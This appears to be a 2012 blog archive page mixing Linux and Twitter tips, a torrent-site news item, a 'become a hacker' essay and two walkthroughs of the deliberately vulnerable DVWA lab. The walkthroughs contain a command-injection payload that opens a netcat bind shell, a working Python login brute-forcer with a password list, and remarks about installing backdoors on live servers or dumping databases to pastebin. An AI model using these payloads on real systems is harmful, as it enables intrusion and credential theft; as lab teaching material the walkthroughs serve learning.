Tuesday 14 February 2012
Hacking Step by Step For Beginners [Guest Post]
This article is an excellent step-by-btep tutorial for those who want to be hackers. Don't expect it to teach you step-wise process of hacking a website or an e-mail address. Instead, this tutorial is aimed to help you how you should proceed to really understand the computer systems so that you become a real computer hacker.
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
Read more...
"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?
Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
The article was originally contributed by rhoit in the foss-nepal mailing list.
Read more...
Bookmark this post: | 
|
Sunday 12 February 2012
Determine All Internet Connections And Corresponding Running Processes In Linux [How To]
Sometimes you might want to see all the internet connections being made by the running processes in the linux system. I am writing this small commandline trick to view all the internet connections using the lsof command.
lsof command is used to all the open files and the processes opening those files. All kind of resources such as disk, network connections, pipes, etc. are actually implemented as files in linux and the lsof command allows you to get the report regarding the opened files.
To view all the internet connections and the corresponding processes, we can simply use the -i switch as below:
The above command runs fine but is a little bit slow since it tries to resolve the network addresses to host names and port numbers to port names. So you might wish to use the command below for faster response from the lsof command.
Also, running the lsof command as the root(i.e. sudo lsof | grep -i listen or sudo lsof -i | grep -i listen) will give more extra outputs esp. the "LISTEN" ones i.e. the processes that are listening for incoming connections. This piece of information might be useful in determining the backdoors and rootkits but I've not yet explored into that.
I hope this little trick comes useful sometimes.
Read more...
lsof command is used to all the open files and the processes opening those files. All kind of resources such as disk, network connections, pipes, etc. are actually implemented as files in linux and the lsof command allows you to get the report regarding the opened files.
To view all the internet connections and the corresponding processes, we can simply use the -i switch as below:
samar@Techgaun:~$ lsof -i
The above command runs fine but is a little bit slow since it tries to resolve the network addresses to host names and port numbers to port names. So you might wish to use the command below for faster response from the lsof command.
samar@Techgaun:~$ lsof -i -Pn
Also, running the lsof command as the root(i.e. sudo lsof | grep -i listen or sudo lsof -i | grep -i listen) will give more extra outputs esp. the "LISTEN" ones i.e. the processes that are listening for incoming connections. This piece of information might be useful in determining the backdoors and rootkits but I've not yet explored into that.
I hope this little trick comes useful sometimes.
Read more...
Bookmark this post: |
|
Saturday 11 February 2012
Useful Twitter Search Tips and Tricks
Lately I've been using twitter a lot and since I love to dig inside stuffs, I thought to learn what features twitter search gives to its user and I found that twitter search is also powerful and supports some handy search operators similar to google(but less than that of google). Here I will list few of the search techniques that you can employ in twitter.
Twitter's search algorithm is pretty decent and it uses an algorithm that determines the quality of the Tweet by letting users interact with it the way they normally do. Anyway lets see few search techniques that will be useful while using twitter.
a) Exact phrase search: Wrapping your search text with double quotes(eg. "cricket nepal") will let you to search for exact phrase in twitter. Note that the exact phrase search also enlists the tweets with special characters such as #, :, etc.(eg. tweets with #cricket #nepal are also seen while searching as "cricket nepal").
b) Using OR operator: OR operator allows you to search for all the tweets containing either of the keywords. An example search would be like politics OR crime.
c) Exclude tweets with certain keywords: If you want to omit the tweets containing certain words, the minus sign can be used to exclude the tweets containing those keywords. For example, the search cricket -india will exclude the tweets containing the word india(Btw, no offense meant).
d) Tweets from specific user: To view the tweets sent by someone, you can simply use the from keyword. For example, from:techgaun would list all the tweets I've sent.
e) Tweets to specific user: You can also view the tweets sent to the specific user i.e. mentions by using the to keyword. For example, to:techgaun would list all the tweets mentioning me.
f) Location based search: Twitter allows you filter your search based on the location. The near keyword can be combined with your search query which can be used to search for results near us. Example searches are near:dhulikhel and resort near:dhulikhel
g) Location + Range search: We can also search twitter within specific distance from a specific location. The within keyword can be combined with the near keyword for this kind of search. Example search queries are near:kathmandu within:10km and near:kathmandu within:10mi
h) Date based search: We can use the twitter's date based search to narrow down our search. The two keywords since and until can be used for date based search in twitter. To search all the tweets about nepal after february 01, 2012 I would do nepal since:2012-02-01 and to search all the tweets about Nepal before 2012 January, I would do nepal until:2012-01-01. For some reason, the until search does not seem to work, at least for me however twitter help shows this keyword in the list.
i) Searching tweets containing URLs: So you might want to search for the useful URLs other people tweet on the twitter. Twitter allows to do such search by using filter keyword. For example, I could find links about web development by the search query web development filter:links.
j) Searching questions: You can use twitter search to find the tweets that are questions. THe ? keyword is used for this purpose. An example search query is social media ? which would result in the tweets containing questions related to social media.
You can combine one or other search techniques to narrow down your search. Also, the advanced twitter search is available HERE. I hope this information becomes useful for you. :)
Read more...
Twitter's search algorithm is pretty decent and it uses an algorithm that determines the quality of the Tweet by letting users interact with it the way they normally do. Anyway lets see few search techniques that will be useful while using twitter.
a) Exact phrase search: Wrapping your search text with double quotes(eg. "cricket nepal") will let you to search for exact phrase in twitter. Note that the exact phrase search also enlists the tweets with special characters such as #, :, etc.(eg. tweets with #cricket #nepal are also seen while searching as "cricket nepal").
b) Using OR operator: OR operator allows you to search for all the tweets containing either of the keywords. An example search would be like politics OR crime.
c) Exclude tweets with certain keywords: If you want to omit the tweets containing certain words, the minus sign can be used to exclude the tweets containing those keywords. For example, the search cricket -india will exclude the tweets containing the word india(Btw, no offense meant).
d) Tweets from specific user: To view the tweets sent by someone, you can simply use the from keyword. For example, from:techgaun would list all the tweets I've sent.
e) Tweets to specific user: You can also view the tweets sent to the specific user i.e. mentions by using the to keyword. For example, to:techgaun would list all the tweets mentioning me.
f) Location based search: Twitter allows you filter your search based on the location. The near keyword can be combined with your search query which can be used to search for results near us. Example searches are near:dhulikhel and resort near:dhulikhel
g) Location + Range search: We can also search twitter within specific distance from a specific location. The within keyword can be combined with the near keyword for this kind of search. Example search queries are near:kathmandu within:10km and near:kathmandu within:10mi
h) Date based search: We can use the twitter's date based search to narrow down our search. The two keywords since and until can be used for date based search in twitter. To search all the tweets about nepal after february 01, 2012 I would do nepal since:2012-02-01 and to search all the tweets about Nepal before 2012 January, I would do nepal until:2012-01-01. For some reason, the until search does not seem to work, at least for me however twitter help shows this keyword in the list.
i) Searching tweets containing URLs: So you might want to search for the useful URLs other people tweet on the twitter. Twitter allows to do such search by using filter keyword. For example, I could find links about web development by the search query web development filter:links.
j) Searching questions: You can use twitter search to find the tweets that are questions. THe ? keyword is used for this purpose. An example search query is social media ? which would result in the tweets containing questions related to social media.
You can combine one or other search techniques to narrow down your search. Also, the advanced twitter search is available HERE. I hope this information becomes useful for you. :)
Read more...
Bookmark this post: |
|
Thursday 9 February 2012
Useful Twitter Keyboard Shortcuts
Twitter allows number of keyboard shortcuts to be used and those shortcuts are quite handy while using twitter. Those shortcuts provide easy, fast and alternative way to do different things in twitter.
Note that these shortcuts work on twitter.com website and will not work on other twitter clients(unless those clients have implemented keyboard shortcuts). I hope the keyboard shortcut lovers will definitely find this list useful. The image below lists all the possible shortcuts that can be used in twitter.
Read more...
Note that these shortcuts work on twitter.com website and will not work on other twitter clients(unless those clients have implemented keyboard shortcuts). I hope the keyboard shortcut lovers will definitely find this list useful. The image below lists all the possible shortcuts that can be used in twitter.
Read more...
Bookmark this post: |
|
Monday 6 February 2012
One of the Largest Bittorrent Search Engine BTJunkie Shuts Down
BTJunkie.org, one of the largest bittorrent index and search engine, has been shut down by the site operators today. The major reason for shutdown is the legal actions taken on other file sharing websites such as thepiratebay and megaupload.
BTJunkie has been one of the biggest bittorrent search engine which came in the torrent scene since 2005. Personally, BTJunkie was #1 source of torrent stuffs for me and I'll definitely miss BTJunkie and I think so will many internet and torrent users.
The official website of BTJunkie is now showing a goodbye message which writes:
This is the end of the line my friends. The decision does not come easy, but we've decided to voluntarily shut down. We've been fighting for years for your right to communicate, but it's time to move on. It's been an experience of a lifetime, we wish you all the best!
Read more...
BTJunkie has been one of the biggest bittorrent search engine which came in the torrent scene since 2005. Personally, BTJunkie was #1 source of torrent stuffs for me and I'll definitely miss BTJunkie and I think so will many internet and torrent users.
The official website of BTJunkie is now showing a goodbye message which writes:
This is the end of the line my friends. The decision does not come easy, but we've decided to voluntarily shut down. We've been fighting for years for your right to communicate, but it's time to move on. It's been an experience of a lifetime, we wish you all the best!
R.I.P. BTJunkie
Read more...
Bookmark this post: |
|
Thursday 2 February 2012
How To View Actual Full URL Of bit.ly URLs
URL shortenings are being widely used these days however one problem with them is possibility that the actual link might be some kind of malware or spam. So it is always a good practice to know the actual URLs the bit.ly URLs are pointing to. I am writing this post to share a short tip on how to view the actual URL of bit.ly shortened URLs.
The process is pretty simple and all you have to do is add a + character at the end of the bit.ly URL and open it in the browser. For example, if I have a URL http://bit.ly/xsbGUp, I will change it to bit.ly/xsbGUp+ and open this new URL in the browser. Then I'll be able to get information regarding this particular URL including the actual long link of that shortened URL. Alternatively, you can load bit.ly/info/xsbGUp to get the same information regarding the shortened URL. I hope this post becomes useful for you. :)
Read more...
The process is pretty simple and all you have to do is add a + character at the end of the bit.ly URL and open it in the browser. For example, if I have a URL http://bit.ly/xsbGUp, I will change it to bit.ly/xsbGUp+ and open this new URL in the browser. Then I'll be able to get information regarding this particular URL including the actual long link of that shortened URL. Alternatively, you can load bit.ly/info/xsbGUp to get the same information regarding the shortened URL. I hope this post becomes useful for you. :)
Read more...
Bookmark this post: |
|
Command Execution Vulnerability - Damn Vulnerable Web App Part 2
We had earlier worked out the bruteforce vulnerability in dvwa in part 1 of the series of articles on dvwa. Today, in this second part, we will be exploiting the command execution vulnerability within dvwa.
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
Bookmark this post: |
|
Brute Force Vulnerability - Damn Vulnerable Web App Part 1
Welcome to the part 1 of the web hacking series based on damn vulnerable web application. I will be guiding all the beginners through the various web hacking technologies by using the open source DVWA application. I would like to suggest to try things on your own before reading all of these tutorials and you could actually use these series of tutorial as walkthroughs.
By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.
In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.
*** For some reason, code looks ugly but copy/paste will work perfectly. ***
A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.
1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.
2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.
3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.
4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:
5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:
6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:
8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.
Read more...
By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.
In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.
*** For some reason, code looks ugly but copy/paste will work perfectly. ***
A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.
1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.
2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.
3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.
users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")
4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
req = urllib2.Request(url)
req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
response = urllib2.urlopen(req)
html = response.read()
6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
#!/usr/bin/python
import urllib2
users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")
for user in users:
for password in passwords:
url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
req = urllib2.Request(url)
req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
response = urllib2.urlopen(req)
html = response.read()
if "Username and/or password incorrect." not in html:
print "Working combination --- %s : %s" %(user, password)
7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:
samar@Techgaun:~/Desktop$ python bruteforce.py
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$
8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)